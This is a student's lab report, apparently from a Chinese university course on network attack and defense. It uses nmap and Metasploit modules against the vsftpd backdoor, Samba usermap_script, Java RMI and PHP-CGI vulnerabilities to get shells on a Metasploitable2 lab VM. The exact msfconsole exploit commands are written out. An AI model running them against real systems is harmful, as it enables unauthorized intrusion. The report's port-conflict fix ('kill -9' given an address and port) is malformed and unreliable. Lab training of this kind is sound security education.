首页 > 其他分享 >20222304 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222304 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-18 20:23:06浏览次数:1  
标签:漏洞 端口 192.168 2024 2025 exploit 228.143 20222304 输入

1.实验内容
1.1实验要求
(1)掌握metasploit、nmap的用法。
(2)学习前期渗透的方法。
(3)利用4个漏洞,实现对靶机的攻击。

1.2学习内容
(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。
(2)四种漏洞的原理。
a. Vsftpd后门漏洞:在某些特定版本的vsftpd服务器中,攻击者通过植入恶意代码,使得当用户名以“:)”结尾时,服务器会在6200端口启动监听,并能够执行任意代码。
b. Samba MS-RPC Shell命令注入漏洞:在Samba中,更新用户口令的功能直接将用户输入传递给了/bin/sh,而没有进行任何过滤。如果攻击者利用MS-RPC接口向该功能提供恶意输入,就能以nobody用户的权限执行任意命令。
c. Java RMI SERVER命令执行漏洞:Java RMI服务器的默认配置存在安全缺陷,特别是在RMI注册表和RMI激活服务中,这些漏洞可以被利用来执行未授权的代码。
d. PHP CGI参数执行注入漏洞:某些CGI脚本对请求参数的处理不当,导致源代码泄露。攻击者可以在请求参数中插入恶意代码,从而执行命令。
2.实验过程
2.1前期渗透
在靶机中使用ipconfig得到ip地址为192.168.228.143.
如图:
在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 192.168.228.0/24
run
扫描到了靶机。
如图:
可以在命令行中输入nmap -p 1-2048 192.168.228.143查看靶机开放的端口。
如图:
还可以在命令行中输入nmap -script=vuln 192.168.228.143对靶机的漏洞进行扫描。这个靶机被设置得非常不安全,有很多漏洞。截取一部分的结果,发现21端口有vsFTPd漏洞,1099端口有RMI registry default configuration remote code execution漏洞,大部分端口都开放着。
如图:


2.2Vsftpd源码包后门漏洞(21端口)
在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.228.143
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功。
如图:
2.3SambaMS-RPC Shell命令注入漏洞(端口139)
在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.228.143
exploit
再输入uname -a命令,可以看到已经获取靶机的shell,攻击成功。
如图:
2.4Java RMI SERVER命令执行漏洞(1099端口)
在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.228.143
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
如图:
2.5PHP CGI参数执行注入漏洞(80端口)
在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.228.143
exploit
shell
可以执行命令,说明攻击成功。
如图:
3.问题及解决方案
问题1:在2.3环节中,我输入exploit后,显示一下错误:[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 192.168.228.143:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
解决方法:通过查询得知4444号端口被占用,我利用命令:kill -9 192.168.228.139:4444
4.学习感悟、思考等
①工具的重要性:Metasploit和Nmap是网络安全领域中非常强大的工具,它们可以帮助我们快速识别和利用漏洞。通过实践,我更加熟悉了这些工具的使用,也体会到了掌握这些工具对于网络安全工作的重要性。
②漏洞的多样性:实验涉及了多种类型的漏洞,包括后门漏洞、命令注入漏洞等。这些漏洞的存在表明,系统安全是一个多维度的问题,需要综合考虑各种潜在的风险点。
③前期渗透的重要性:在攻击过程中,前期的渗透和信息收集是非常关键的。通过前期的渗透,我可以了解目标系统的配置和潜在的弱点,为后续的攻击提供方向。
④防御意识的重要性:实验虽然成功,但更重要的是从中学习到如何防御类似的攻击。了解攻击手法后,可以更好地加固系统,提高安全性。
⑤持续学习:网络攻防是一个不断发展的领域,新的漏洞和攻击手法层出不穷。这次实验只是一个开始,持续学习和实践是提升网络安全技能的关键。

标签:漏洞,端口,192.168,2024,2025,exploit,228.143,20222304,输入
From: https://www.cnblogs.com/amlyl/p/18553529

相关文章

  • 20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    一、实验内容本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/下载官方靶机Metasploitable2,完成下面实验内容。用户名密码均为:msfadmin(1)前期渗透①主机发现(可用Aux中的ar......
  • 20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    202224202024-2025-1《网络与系统攻防技术》实验六实验报告1.实验内容(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等③选做:也可以扫系统版本、漏洞等。(2)Vsftpd源码包后门漏洞(21端口)漏洞原理:在特......
  • 【Project 2024软件下载与安装教程-亲测好用】
    ‌Project2024的操作系统要求是Windows10及以上版本‌。这意味着用户需要在Windows10或更高版本的操作系统上安装和使用Project2024‌1。Project2024是由Microsoft开发的一款高效实用的项目管理工具,旨在帮助项目经理发展计划、为任务分配资源、跟踪进度、管理预算和分析工作......
  • 2025 Lightroom(Lr)安装包下载百度云资源分享
    如大家所熟悉的,LR是AdobeLightroom的简称。相较于PS,LR在图片处理方面更加专业且更受摄影人士、专业影楼所待见。Lightroom是一种非破坏性编辑软件,可将原始图像与任何程序内编辑分开,并将编辑后的图像另存为新文件。Lightroom的编辑功能包括白平衡、存在感、色调、色调曲线、HS......
  • 【Visio 2024软件下载与安装教程-亲测好用】
    MicrosoftVisio2024专业版是一款专业的专业矢量绘图软件。Visio2024不但新增了许多功能,而且还优化了众多性能,比如用户界面优化、更多图形元素库、允许用户邀请其他人一起编辑和查看图表、过程自动化等等,其一系列的改动旨在给予用户们最直观、最便利的操作体验!操作系统‌:Visio......
  • 2024年11月17日 星期天 Go语言基础
    今日格言坚持每天进步一点点~一个人也可以是一个团队~学习全栈开发,做自己喜欢的产品~~Go语言的创始人Go语言的创始人有三位,分别是:RobertGriesemer:他参与开发了JavaHotSpot虚拟机。RobPike:他是Go语言项目的总负责人,曾是贝尔实验室Unix团队的成员,参与过Plan9、Inf......
  • # 20222309 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)......
  • 2024-2025, 四大翻译工具加AI翻译的深度对比
    前言在过去两年中,人工智能技术的迅猛发展对翻译工具产生了深远的影响。本期特意挑选了四款翻译工具以及一个AI翻译工具,对其性能进行评测,看看在AI技术的加持下,它们的质量提升如何。以下是参赛选手的简介:谷歌翻译谷歌翻译自2006年推出以来,一直是全球最受欢迎的翻译工具,稳居翻......
  • 2024年最值得关注的13款项目管理软件推荐
    2024年最值得关注的13款项目管理软件推荐随着团队协作的日益复杂,项目管理软件成为各类组织不可或缺的工具。无论是软件开发、市场营销,还是跨部门的大型项目管理,都能从中受益。2024年,项目管理工具不断更新和升级,提供了更多样化和专业化的功能。在这一年里,有不少项目管理软件凭借其......
  • 202222313 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容1.1实验要求(1)掌握metasploit、nmap的用法。(2)学习前期渗透的方法。(3)利用4个漏洞,实现对靶机的攻击。1.2学习内容(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。(2)四种漏洞的原理。Vsftpd源码包后门漏洞:在特定版本的vsftpd......